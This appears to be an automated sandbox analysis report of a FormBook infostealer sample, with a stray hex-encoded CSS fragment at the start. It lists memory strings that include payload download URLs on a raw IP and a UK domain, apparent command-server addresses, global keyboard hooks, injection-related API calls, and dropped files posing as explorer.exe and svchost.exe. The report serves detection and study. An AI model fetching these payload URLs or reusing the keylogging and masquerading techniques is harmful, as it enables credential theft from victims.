6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20

Source: os9tzxfmtz.exe	String found in binary or memory: http://103.141.138.118/bin_iOxAb78.bin
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.499129422.0000017AF2815000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.495084605.0000017AED2B1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2
Source: svchost.exe, 00000007.00000002.500311596.0000017AF2AD0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gifA
Source: explorer.exe, 00000004.00000002.367258347.00000000007A1000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.googlecode.com/files/cmsys.gift
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367305174.00000000007CA000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifnw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifr
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.t35.com/cmsys.gifusercontent.comn
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.t35.com/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/
Source: explorer.exe, 00000004.00000002.367234221.0000000000783000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd01.zxq.net/01.zxq.net/cmsys.gifusercontent.comu
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gif
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifH
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifVw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifllxw
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gifr
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/cmsys.gift
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd01.zxq.net/e.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd02.googlecode.com/files/cmsys.gifi%I
Source: explorer.exe, 00000004.00000002.367343924.00000000007E8000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp, explorer.exe, 00000004.00000002.367327455.00000000007DD000.00000004.00000020.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gif
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifC%c
Source: explorer.exe, 00000004.00000003.317775813.00000000007DE000.00000004.00000001.sdmp	String found in binary or memory: http://vccmd03.googlecode.com/files/cmsys.gifP%n
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000021.00000002.493270876.00000240A1E40000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: os9tzxfmtz.exe	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.bin
Source: os9tzxfmtz.exe , 0000001D.00000002.347705923.0000000000563000.00000040.00000001.sdmp	String found in binary or memory: https://demo.sdssoftltd.co.uk/bin_iOxAb78.binhttp://103.141.138.118/bin_iOxAb78.bin
Source: explorer.exe, 00000004.00000003.317744632.00000000007CA000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.comI

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Windows user hook set: 6252 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Users\user\AppData\Local\icsys.icn.exe	Windows user hook set: 6340 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe	Windows user hook set: 6388 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 keyboard low level c:\windows\system\explorer.exe
Source: C:\Windows\System\explorer.exe	Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 6412 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\svchost.exe	Windows user hook set: 6444 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\spoolsv.exe	Windows user hook set: 6636 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
Source: C:\Windows\System\explorer.exe	Windows user hook set: 6884 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL

Source: os9TZxfmTZ.exe, 00000000.00000002.252539425.000000000075A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\System\explorer.exe

Windows user hook set: 0 mouse low level c:\windows\system\explorer.exe

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280A61 EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289F5D NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228906B NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022899F7 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289A29 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A38 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A234 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A05 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A27F NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283E5F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A51 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283EAF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283A9B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283AE7 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A321 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283F07 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228376D NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289F63 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A363 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280B46 NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280B53 NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283B57 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289FAF NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283B88 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283F88 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02289FE8 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283BE9 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280BEB NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283FC8 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A3D3 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A020 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228404F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283C4F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02280C41 NtSetInformationThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A055 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A0A4 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283C94 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283CD3 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283911 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A113 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283166 NtWriteVirtualMemory,LoadLibraryA,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A14B NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283D4D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228395B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A189 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_02283DEF NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A1F4 NtResumeThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_022839C3 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_0228A1C3 NtResumeThread,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DF00 NtReadVirtualMemory,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DE10 NtReadFile,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD60 NtCreateFile,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DE0A NtReadFile,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD62 NtCreateFile,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DD1C NtCreateFile,
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0375DDB2 NtReadFile,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA3B0 NtGetContextThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EB040 NtSuspendThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EAD30 NtSetContextThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9950 NtQueueApcThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A10 NtQuerySection,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E96D0 NtCreateKey,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3EA770 NtOpenThread,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9760 NtOpenProcess,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E9560 NtWriteFile,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3E99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_005699F7 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00569A29 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_00569EB9 NtProtectVirtualMemory,

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File created: c:\windows\system\explorer.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\icsys.icn.exe

File deleted: C:\Windows\System\explorer.exe

Jump to behavior

Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_0041F830
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_00416130
Source: C:\Users\user\Desktop\os9TZxfmTZ.exe	Code function: 0_2_00422F50
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00401A5C
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 1_2_00401AAC
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03761306
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03762212
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03746FB0
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03760FA6
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0374DE40
Source: C:\Windows\System\explorer.exe	Code function: 4_2_0374DE3B
Source: C:\Windows\System\explorer.exe	Code function: 4_2_037625BA
Source: C:\Windows\System\explorer.exe	Code function: 4_2_03746D90
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C6E30
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472EF7
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4722AE
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472B28
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3DEBB0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E46DBD2
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E471FF1
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3B841F
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E461002
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D20A0
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BB090
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E4720A8
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E471D55
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3A0D20
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3C4120
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3AF900
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E472D07
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3D2581
Source: C:\Users\user\Desktop\os9tzxfmtz.exe	Code function: 29_2_1E3BD5E0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\icsys.icn.exe F6B230F7A36830E443AEAF69C1826F3188C8C2247C6711D0148E12EC5A29DBB1
Source: Joe Sandbox View	Dropped File: C:\Users\user\Desktop\os9tzxfmtz.exe 446FFBE53145C93AC0D5F2201A7602846D272FD772936583125B0BD0D331D04A

Source: C:\Users\user\Desktop\os9tzxfmtz.exe

Code function: String function: 1E3AB150 appears 35 times

Source: os9tzxfmtz.exe .0.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: os9TZxfmTZ.exe, 00000000.00000002.252397999.000000000042E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe, 00000000.00000003.252174241.00000000007A4000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe	Binary or memory string: OriginalFilenameWin.exe vs os9TZxfmTZ.exe
Source: os9TZxfmTZ.exe	Binary or memory string: OriginalFilenameHovedproble7.exe vs os9TZxfmTZ.exe

Source: C:\Windows\System\explorer.exe	Section loaded: tokenbinding.dll
Source: C:\Windows\System\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System\svchost.exe	Section loaded: drprov.dll
Source: C:\Windows\System\svchost.exe	Section loaded: ntlanman.dll
Source: C:\Windows\System\svchost.exe	Section loaded: davclnt.dll
Source: C:\Windows\System\svchost.exe	Section loaded: davhlpr.dll
Source: C:\Windows\System\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System\svchost.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cdpsgshims.dll

Source: os9TZxfmTZ.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.353190007.000000001E150000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.347654001.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.368572720.0000000003740000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: os9TZxfmTZ.exe, 00000000.00000002.252392951.000000000042C000.00000004.00020000.sdmp, icsys.icn.exe, 00000002.00000002.268744646.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000005.00000002.269404298.000000000042C000.00000004.00020000.sdmp, spoolsv.exe, 00000008.00000002.267615797.000000000042C000.00000004.00020000.sdmp, explorer.exe, 00000026.00000002.289684739.000000000042C000.00000004.00020000.sdmp	Binary or memory string: f`P@*\AD:\Code\Explorer\Explorer.vbp
